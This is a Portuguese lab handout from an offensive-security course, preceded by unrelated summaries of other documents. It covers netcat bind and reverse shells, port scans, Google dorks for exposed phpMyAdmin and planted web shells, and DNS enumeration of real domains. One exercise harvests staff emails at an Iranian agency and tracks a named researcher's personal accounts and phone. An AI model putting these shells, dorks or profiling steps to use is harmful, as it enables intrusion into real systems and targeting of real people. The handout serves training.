1) O documento descreve as funcionalidades do firewall Endian Firewall Community Edition, incluindo configuração de proxy web, filtragem de conteúdo, antivírus e regras de firewall.
2) É possível habilitar proxy para HTTP, POP3 e DNS, além de configurar filtragem de conteúdo com base em palavras-chave, URLs e categorias.
3) O firewall possui interface para configurar regras de saída, encaminhamento de portas e servidor DHCP.
Este documento descreve como criar chaves PGP usando o GNU Privacy Guard (GPG) nos sistemas operacionais Windows XP e Linux Ubuntu. Ele explica como gerar chaves, exportar e importar chaves públicas entre os sistemas, e criptografar/descriptografar arquivos usando as chaves.
Este documento apresenta uma introdução ao curso de Segurança Linux e aborda tópicos como hardening do sistema operacional, rede e serviços, criptografia e tunning do kernel para fortalecimento da segurança.
O documento discute como os sistemas RFID funcionam e como eles podem ser vulneráveis à interceptação de dados. Explica que os campos eletromagnéticos transmitem informações entre leitores e etiquetas RFID, e que esses dados podem ser capturados por dispositivos que detectam esses campos. Isso permite clonar etiquetas RFID e obter acesso não autorizado a sistemas que usam RFID.
O documento fornece uma introdução à tecnologia RFID, explicando seu funcionamento baseado em campos eletromagnéticos e as informações que podem ser armazenadas. Também discute brevemente a evolução histórica dos códigos de barras para as etiquetas eletrônicas RFID e identifica algumas vulnerabilidades de segurança destas últimas que serão exploradas no próximo artigo.
O documento descreve vários tipos de ataques à aplicações web, incluindo roubo de sessões, XSS, XSRF, SQL Injection, traversal de diretório e overflows. Ele fornece exemplos de como esses ataques funcionam na prática e como podem ser realizados usando a aplicação Google Gruyere, que foi propositalmente desenvolvida com vulnerabilidades para fins educacionais.
O documento discute técnicas para permanecer anônimo na internet, incluindo navegação via servidores proxy, Tor e VPN. Também aborda formas de realizar ataques de hacking de forma anônima, como o Idle Scan e o uso de botnets. O documento inclui demonstrações práticas destas técnicas.
O documento apresenta um seminário sobre engenharia social, definindo-a como a arte de hackear pessoas por meio de enganação para obter informações confidenciais. Apresenta exemplos de como isso é feito, ferramentas usadas como sites de busca, mídias sociais e equipamentos de espionagem, e conclui convidando para debate.
Este documento apresenta um tutorial sobre como usar o software Maltego para realizar data mining e obter informações sobre uma pessoa a partir de seu email. Ele explica como escolher um email aleatório, pesquisar por outros emails, domínios e informações relacionadas usando as ferramentas do Maltego. O tutorial destaca como organizar as informações coletadas em um log para direcionar as buscas.
O documento descreve um curso de ética hacker com a ferramenta Backtrack, com 32 horas de duração sobre 4 sábados. O curso ensinará técnicas de hacking ético como reconhecimento de rede, port scanning, exploração de vulnerabilidades e engenharia social usando ferramentas como Nmap, Metasploit e SET.
This document provides a network diagram of a lab perimeter. It shows a Debian host connected to both a host only network at 172.16.50.0/24 and a NAT/VMware network at 172.16.49.0/24. A virtual machine called SW-virtual is connected to the NAT/VMware network and has an IP of 172.16.49.100.
O documento discute as principais topologias de rede: barramento, estrela e anel. No barramento todos os computadores são ligados por um único cabo. Na estrela cada computador é ligado a um ponto central. No anel a ligação física é em estrela e a lógica em anel. As topologias afetam a capacidade, gerenciamento e crescimento da rede.
1. Laboratório do Curso de Segurança Ofensiva
Netcat e Enumeração (Google Hacking, Whois e DNS)
1. NETCAT
a) Ajuda
root@bt:~/lab_bash-script# nc -h
[v1.10-38]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands
as `-e'; use /bin/sh to exec [dangerous!!]
-e filename
program to exec after connect [dangerous!!]
-b
allow broadcasts
-g gateway
source-routing hop point[s], up to 8
-G num
source-routing pointer: 4, 8, 12, ...
-h
this cruft
-i secs
delay interval for lines sent, ports scanned
-k
set keepalive option on socket
-l
listen mode, for inbound connects
-n
numeric-only IP addresses, no DNS
-o file
hex dump of traffic
-p port
local port number
-r
randomize local and remote ports
-q secs
quit after EOF on stdin and delay of secs
-s addr
local source address
-T tos
set Type Of Service
-t
answer TELNET negotiation
-u
UDP mode
-v
verbose [use twice to be more verbose]
-w secs
timeout for connects and final net reads
-z
zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp-data').
root@bt:~/lab_bash-script#
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
1
2. b) Banner grabbing
Verificando portas abertas e lendo banners
root@bt:~/lab_bash-script# nc -nv 172.16.49.100 21
(UNKNOWN) [172.16.49.100] 21 (ftp) open
220 (vsFTPd 2.3.0)
root@bt:~/lab_bash-script# nc -nv 172.16.49.100 80
(UNKNOWN) [172.16.49.100] 80 (www) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 20 Jun 2012 22:01:42 GMT
Server: Apache/2.2.16 (Ubuntu)
Last-Modified: Wed, 20 Jun 2012 21:57:24 GMT
ETag: "c5af2-b1-4c2ee7bee7e05"
Accept-Ranges: bytes
Content-Length: 177
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
c) CHATT Simples
No Backtrack
nc -lvp 4444
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
2
3. No Windows XP-SP2
nc -nv 172.16.49.130 4444
Basta digitar qualquer coisa em qualquer uma das máquinas
d) Administração Remota
- BIND SHEL
No BT localizado na rede externa
root@bt:~# nc -lvp 4444 -e /bin/bash
listening on [any] 4444 ...
No maquina windows XP-SP2 na rede interna
C:>nc -nv 172.16.49.130 4444
(UNKNOWN) [172.16.49.130] 4444 (?) open
ls
Desktop
lab_bash-script
rota.sh
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
3
4. - REVERSE SHELL – NC
No BT localizado na rede externa
root@bt:~# nc -lvp 4444
listening on [any] 4444 ...
Na máquina windows XP-SP2 na rede interna
C:>nc -nv 172.16.49.130 4444 -e cmd.exe
(UNKNOWN) [172.16.49.130] 4444 (?) open
Resultado no BT
root@bt:~# nc -lvp 4444
listening on [any] 4444 ...
172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1214
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:>hostname
hostname
CTP028
C:>
e) Port Scan
BT externo scaneando o Firewall (portas 21 a 30)
root@bt:~# nc -z -nvv -w 1 172.16.49.100 21-30
(UNKNOWN) [172.16.49.100] 30 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 29 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 28 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 27 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 26 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 25 (smtp) : Connection refused
(UNKNOWN) [172.16.49.100] 24 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 23 (telnet) : Connection refused
(UNKNOWN) [172.16.49.100] 22 (ssh) open
(UNKNOWN) [172.16.49.100] 21 (ftp) open
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
4
5. f) Transferência de Arquivos
BT externo scaneando o Firewall (portas 21 a 30)
root@bt:~# nc -lvp 4444 > output.txt
listening on [any] 4444 ...
172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1224
No windows XP-SP2 na rede interna
C:>nc.exe -nv 172.16.49.130 4444 < arq1.txt
(UNKNOWN) [172.16.49.130] 4444 (?) open
Resultado
root@bt:~# ls
Desktop lab_bash-script output.txt rota.sh
root@bt:~# more output.txt
teste de transferencia
root@bt:~#
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
5
6. 2. Google Search
google search operators - verificar site operator e outros
site:offensive-security.com - ver quantas pag web tem o domínio - paginas indexadas
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
6
14. Software de videoconf
intext:"Videoconference Management System" ext:htm
phpmyadmin aberto
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
14
15. Norton AV for gateways
inurl:"8003/Display?what="
contatos MSN
filetype:ctt "msn"
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
15
16. Kickstart
#kickstart filetype:cfg
#kickstart filetype:cfg site:gov.br
CUIDADO!!!!!!
backdoor apache
intitle:r57 shell filetype:php
Site com backdoor plantado - antichat no title
intitle:"Antichat Shell" "disable functions"
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
16
17. 3. Google Search Social
aeoi.org.ir puro no google - ver emails
utilizar theharvester.py (script em python no BT)
root@bt:~# cd /pentest/enumeration/theharvester/
root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d aeoi.org.ir -l 500 -b
google
[-] Searching in Google:
Searching 0 results...
Searching 100 results...
Searching 200 results...
[+] Emails found:
-----------------hkazemian@aeoi.org.ir
sjahmadi@aeoi.org.ir
smshirvani@aeoi.org.ir
mmostaedi@aeoi.org.ir
AA37120067@aeoi.org.ir
jrahighi@aeoi.org.ir
sabolhosseini@aeoi.org.ir
mghannadi@aeoi.org.ir
rd@aeoi.org.ir
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
17
18. usar hkazemian@aeoi.org.ir
é um pesquisador, tem email yahoo
usar hkazemian@yahoo.com
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
18
19. ver SPAG Zeolite
end da empress tel de contato e outro email do gmail
- procurar foto
usar hosseinkazemian@gmail.com - procurando apto veja telefone
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
19
22. Consulta whois
root@bt:~# whois checkpoint.com | more
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Server Name: CHECKPOINT.COM
IP Address: 216.200.241.66
Registrar: NETWORK SOLUTIONS, LLC.
Whois Server: whois.networksolutions.com
Referral URL: http://www.networksolutions.com/en_US/
Domain Name: CHECKPOINT.COM
Registrar: NETWORK SOLUTIONS, LLC.
Whois Server: whois.networksolutions.com
Referral URL: http://www.networksolutions.com/en_US/
Name Server: NS2.CHECKPOINT.COM
Name Server: NS6.CHECKPOINT.COM
Name Server: NS8.CHECKPOINT.COM
Name Server: NS9.CHECKPOINT.COM
Status: clientTransferProhibited
Updated Date: 30-may-2012
Creation Date: 29-mar-1994
Expiration Date: 30-mar-2018
Administrative Contact, Technical Contact:
Admin, DNS
hostmaster@CHECKPOINT.COM
Check Point Software Technologies Ltd.
3A Jabotinsky St.
Ramat-Gan, 52520
IL
+972-3-7534555 fax: +972-3-5759256
Record expires on 30-Mar-2018.
Record created on 29-Mar-1994.
Database last updated on 20-Jun-2012 22:30:44 EDT.
Domain servers in listed order:
NS2.CHECKPOINT.COM
NS6.CHECKPOINT.COM
NS8.CHECKPOINT.COM
NS9.CHECKPOINT.COM
206.184.151.195
194.29.32.199
216.228.148.29
194.29.38.64
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
22
23. Consulta Reversa whois
root@bt:~# whois 216.200.241.66
#
# Query terms are ambiguous. The query is assumed to be:
# "n 216.200.241.66"
#
# Use "?" to get help.
#
#
# The following results may also be obtained via:
#
http://whois.arin.net/rest/nets;q=216.200.241.66?showDetails=true&showARIN=false&ext=
netref2
#
CHECKPOINT SOFTWARE MFN-B655-216-200-241-64-28 (NET-216-200-241-64-1)
216.200.241.64 - 216.200.241.79
Abovenet Communications, Inc ABOVENET-5 (NET-216-200-0-0-1) 216.200.0.0 216.200.255.255
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
23
24. 5. DNS
Consultas Manuais
root@bt:~# nslookup www.checkpoint.com
Server:
172.16.49.2
Address:
172.16.49.2#53
Non-authoritative answer:
Name: www.checkpoint.com
Address: 216.200.241.66
Consulta de Servidor de Email e de Nomes do domínio
root@bt:~# nslookup
> set type=mx
> checkpoint.com
Server:
172.16.49.2
Address:
172.16.49.2#53
Non-authoritative answer:
checkpoint.com mail exchanger = 12 sami.checkpoint.com.
checkpoint.com mail exchanger = 15 usmail-as.zonelabs.com.
Authoritative answers can be found from:
> set type=ns
> checkpoint.com
Server:
172.16.49.2
Address:
172.16.49.2#53
Non-authoritative answer:
checkpoint.com nameserver = ns2.checkpoint.com.
checkpoint.com nameserver = ns6.checkpoint.com.
checkpoint.com nameserver = ns8.checkpoint.com.
checkpoint.com nameserver = ns9.checkpoint.com.
checkpoint.com nameserver = ns1.checkpoint.com.
Authoritative answers can be found from:
>
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
24
25. - DNS Information Gathering
1- forward lookup BF - tentar acertar nomes validos
root@bt:~/lab_DNS# host www.checkpoint.com
www.checkpoint.com has address 216.200.241.66
www.checkpoint.com has IPv6 address 2620:0:2a01:2::1a10
root@bt:~/lab_DNS# host wwwwwwww.checkpoint.com
Host wwwwwwww.checkpoint.com not found: 3(NXDOMAIN)
root@bt:~/lab_DNS#
- usar script1.sh no BT para FB (sem manipulação)
root@bt:~/lab_DNS# more script_dns1.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com
done
- usar script2.sh no BT para FB ("has address")
root@bt:~/lab_DNS# more script_dns2.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com | grep "has address"
done
root@bt:~/lab_DNS# ./script_dns2.sh
forums.checkpoint.com has address 194.29.38.13
ftp.checkpoint.com has address 194.29.38.25
ftps.checkpoint.com has address 194.29.38.27
mailhost.checkpoint.com has address 194.29.32.199
cale.checkpoint.com has address 194.29.32.199
mx1.checkpoint.com has address 194.29.38.66
ns.checkpoint.com has address 194.29.32.199
ns1.checkpoint.com has address 208.185.174.140
ns2.checkpoint.com has address 208.185.174.141
register.checkpoint.com has address 194.29.38.35
search.us.checkpoint.com has address 209.87.209.207
smtp.checkpoint.com has address 194.29.34.68
www.checkpoint.com has address 216.200.241.66
www.checkpoint.com has address 216.200.241.66
root@bt:~/lab_DNS#
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
25
26. - usar script3.sh no BT para FB (só IPs)
root@bt:~/lab_DNS# more script_dns3.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com | grep "has address" | cut -d" " -f4
done
root@bt:~/lab_DNS# ./script_dns3.sh
194.29.38.13
194.29.38.25
194.29.38.27
194.29.32.199
194.29.32.199
194.29.38.66
194.29.32.199
208.185.174.140
208.185.174.141
194.29.38.35
209.87.209.207
194.29.34.68
216.200.241.66
216.200.241.66
2- reverse lookup BF
- Tentar resolução Reversa
root@bt:~/lab_DNS# host 216.200.241.66
66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com.
root@bt:~/lab_DNS# for ip in $(seq 64 79); do host 216.200.241.$ip | grep "domain
name pointer" ;done
64.241.200.216.in-addr.arpa domain name pointer 216.200.241.64.available.above.net.
65.241.200.216.in-addr.arpa domain name pointer lata-gw.us.checkpoint.com.
66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com.
67.241.200.216.in-addr.arpa domain name pointer garmin.us.checkpoint.com.
68.241.200.216.in-addr.arpa domain name pointer flanger.us.checkpoint.com.
69.241.200.216.in-addr.arpa domain name pointer gould.us.checkpoint.com.
70.241.200.216.in-addr.arpa domain name pointer franklin.us.checkpoint.com.
71.241.200.216.in-addr.arpa domain name pointer darwin.us.checkpoint.com.
72.241.200.216.in-addr.arpa domain name pointer artemis.us.checkpoint.com.
73.241.200.216.in-addr.arpa domain name pointer amadeus.us.checkpoint.com.
74.241.200.216.in-addr.arpa domain name pointer streamer.us.checkpoint.com.
75.241.200.216.in-addr.arpa domain name pointer lata1.us.checkpoint.com.
76.241.200.216.in-addr.arpa domain name pointer lata2.us.checkpoint.com.
77.241.200.216.in-addr.arpa domain name pointer davis1.us.checkpoint.com.
78.241.200.216.in-addr.arpa domain name pointer davis2.us.checkpoint.com.
79.241.200.216.in-addr.arpa domain name pointer 216.200.241.79.available.above.net.
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
26
27. 3- Zone transfer
root@bt:~# host -t ns offensive-security.com
offensive-security.com name server ns4.no-ip.com.
offensive-security.com name server ns2.no-ip.com.
offensive-security.com name server ns1.no-ip.com.
offensive-security.com name server ns3.no-ip.com.
offensive-security.com name server ns5.no-ip.com.
root@bt:~# host -l offensive-security.com ns1.no-ip.com
; Transfer failed.
Using domain server:
Name: ns1.no-ip.com
Address: 204.16.255.55#53
Aliases:
Host offensive-security.com.localdomain not found: 9(NOTAUTH)
; Transfer failed.
------tentar com todos servidores de nomes - (primário e secundários)
------fazer com aeoi.org.ir e estacio.br
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
27
28. Usar /pentest/enumeration/dnsenum
root@bt:/pentest/enumeration/dns/dnsenum# ls
dns-big.txt dnsenum.pl dns.txt README.txt
root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl estacio.br
estacio.br
5
IN A
200.216.152.71
Name Servers:
ns1.estacio.br
ns2.estacio.br
5
5
IN A
IN A
200.216.152.249
200.216.152.250
Mail (MX) Servers:
Mail.Global.FrontBridge.com
5
IN A
216.32.180.22
Mail.Global.FrontBridge.com
5
IN A
216.32.181.178
estacio.br
1800 IN TXT
estacio.br
1800 IN A
200.216.152.71
1989163337.estacio.br
1800 IN CNAME
mail._domainkey.estacio.br
14400 IN TXT
agenda.estacio.br
1800 IN A
200.216.152.71
agendaconselho.estacio.br
1800 IN A
200.216.152.71
aluno.estacio.br
1800 IN MX
biblioteca.estacio.br
1800 IN CNAME
bibliotecasonora.estacio.br
1800 IN A
200.216.152.90
blogdopresidente.estacio.br
1800 IN A
200.216.152.149
bquestoes.estacio.br
1800 IN A
200.216.152.63
adm.bquestoes.estacio.br
1800 IN A
200.216.152.62
provas.bquestoes.estacio.br
1800 IN A
200.216.152.63
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
28